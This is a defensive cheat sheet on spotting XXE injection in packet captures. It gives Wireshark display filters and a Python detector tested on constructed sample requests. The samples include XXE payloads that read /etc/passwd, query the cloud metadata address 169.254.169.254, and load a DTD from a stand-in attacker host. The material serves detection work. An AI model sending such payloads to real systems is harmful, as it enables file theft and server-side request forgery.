Operator On The Wire

XXE

Attacker injects external entity declarations into XML the application parses; a parser that expands them reads local files, performs SSRF against internal systems, or sends the result to an attacker-controlled host


Hunting

Statistics → Conversations → IPv4
Statistics → Endpoints → IPv4
Statistics → Protocol Hierarchy
Statistics → IO Graph


Red Flags

  • <!DOCTYPE inside a request body (direction matters: every HTML response legitimately starts with <!DOCTYPE html>)
  • <!ENTITY declarations, including parameter entities (<!ENTITY % name SYSTEM "...">) used for blind / out-of-band XXE
  • SYSTEM or PUBLIC external identifiers inside an entity declaration (the word SYSTEM alone is not a signal)
  • XML requests carrying URLs the application has no reason to fetch (attacker-controlled DTD hosts, internal or link-local addresses)
  • File path references (file:///etc/passwd, C:\Windows\win.ini)

Filters

# XML DOCTYPE declaration in a request body. Restrict to requests: every HTML
# response starts with <!DOCTYPE html> and would match otherwise.
http.request and http contains "<!DOCTYPE"

# ENTITY declaration (internal or external) in a request
http.request and http contains "<!ENTITY"

# External entity: SYSTEM or PUBLIC inside an ENTITY declaration. A bare
# http contains "SYSTEM" hits the word anywhere in any body and is too noisy;
# (?i) makes the match explicitly case-insensitive, since parsers accept
# <!entity ... system ...> as well.
http.request and http matches "(?i)<!entity[^>]*(system|public)"

# file: scheme in a request (local file read)
http.request and http matches "(?i)file:/"

# Common sensitive file targets
http.request and (http contains "/etc/passwd" or http contains "win.ini")

Caveats: contains is a case-sensitive byte match, matches is a regex. Both only see cleartext HTTP; for HTTPS the TLS session keys (SSLKEYLOGFILE) must be loaded so Wireshark can decrypt and dissect the bodies, otherwise nothing above fires.
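The Red Flags and Filters above, turned into detection logic over sample HTTP bodies. This is an added example, not code from the original page or from Wireshark; the sample bodies are constructed, attacker.example is a placeholder host, and the flag names are chosen for illustration. It does what a single display filter cannot: only request bodies are checked for DOCTYPE, SYSTEM/PUBLIC only count inside an ENTITY declaration, keyword case is ignored, and a parameter entity (the out-of-band variant) is called out separately.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample HTTP bodies (name, is_request, body). None of this is
# captured traffic; attacker.example is a placeholder host.
SAMPLES: List[Tuple[str, bool, str]] = [
    ("xxe_file", True,
     '<?xml version="1.0"?>\n'
     '<!DOCTYPE order [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>\n'
     '<order><id>&xxe;</id></order>'),
    ("xxe_ssrf", True,
     # lower-case keywords: parsers accept them, a case-sensitive filter misses them
     '<?xml version="1.0"?>\n'
     '<!doctype order [ <!entity xxe system "http://169.254.169.254/latest/meta-data/"> ]>\n'
     '<order><id>&xxe;</id></order>'),
    ("xxe_parameter", True,
     # parameter entity pulling an external DTD: the blind / out-of-band variant
     '<?xml version="1.0"?>\n'
     '<!DOCTYPE order [ <!ENTITY % ext SYSTEM "http://attacker.example/evil.dtd"> %ext; ]>\n'
     '<order/>'),
    ("benign_xml", True,
     '<?xml version="1.0"?><order><id>42</id></order>'),
    ("benign_soap", True,
     # "SYSTEM" as ordinary text: trips http contains "SYSTEM", not this check
     '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
     '<soap:Body><note>SYSTEM maintenance window tonight</note></soap:Body>'
     '</soap:Envelope>'),
    ("benign_html_response", False,
     # every HTML page starts with a DOCTYPE; responses must not be flagged
     '<!DOCTYPE html><html><body>ok</body></html>'),
]

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
ENTITY_DECL_RE = re.compile(r"<!ENTITY\b", re.IGNORECASE)
# External entity: <!ENTITY [%] name SYSTEM "uri"> or
#                  <!ENTITY [%] name PUBLIC "public-id" "uri">
EXTERNAL_ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?P<param>%\s*)?(?P<name>[^\s%>]+)\s+"
    r"(?:SYSTEM\s+(?P<sys>\"[^\"]*\"|'[^']*')"
    r"|PUBLIC\s+(?:\"[^\"]*\"|'[^']*')\s+(?P<pub_sys>\"[^\"]*\"|'[^']*'))",
    re.IGNORECASE,
)
SENSITIVE_PATHS = ("/etc/passwd", "/etc/shadow", "win.ini", "/proc/self")
# Schemes that turn the entity into an outbound request (SSRF / OOB exfil).
REMOTE_SCHEMES = ("http:", "https:", "ftp:", "gopher:", "jar:")


def inspect_body(body: str, is_request: bool = True) -> List[str]:
    """Return the XXE red flags raised by one HTTP body, in detection order.

    Only request bodies are inspected: entity injection arrives in the request,
    and HTML responses legitimately begin with <!DOCTYPE html>.
    """
    flags: List[str] = []
    if not is_request:
        return flags
    if DOCTYPE_RE.search(body):
        flags.append("doctype_in_request")
    if ENTITY_DECL_RE.search(body):
        flags.append("entity_declaration")
    for m in EXTERNAL_ENTITY_RE.finditer(body):
        if m.group("param"):
            flags.append("parameter_entity")
        flags.append("external_entity")
        uri = (m.group("sys") or m.group("pub_sys"))[1:-1].strip().lower()
        if uri.startswith("file:"):
            flags.append("file_scheme")
        elif uri.startswith(REMOTE_SCHEMES):
            flags.append("external_url")
    if any(p in body.lower() for p in SENSITIVE_PATHS):
        flags.append("sensitive_path")
    return list(dict.fromkeys(flags))  # de-duplicate, keep order


def is_xxe(flags: List[str]) -> bool:
    """An external entity declaration is the defining feature of an XXE payload;
    a bare DOCTYPE or a sensitive-looking string on its own is only a lead."""
    return "external_entity" in flags


def triage(samples: List[Tuple[str, bool, str]] = SAMPLES) -> Dict[str, List[str]]:
    """Run every sample through inspect_body and map its name to its flags."""
    return {name: inspect_body(body, is_request) for name, is_request, body in samples}


if __name__ == "__main__":
    for name, flags in triage().items():
        verdict = "XXE" if is_xxe(flags) else "ok"
        print(f"{name:22s} {verdict:4s} {', '.join(flags) or '-'}")
```

Feed it the reassembled request bodies exported from a capture (File → Export Objects → HTTP, or tshark -T fields -e http.file_data) and the external_entity flag is the one to alert on; doctype_in_request and sensitive_path alone are triage leads, not verdicts.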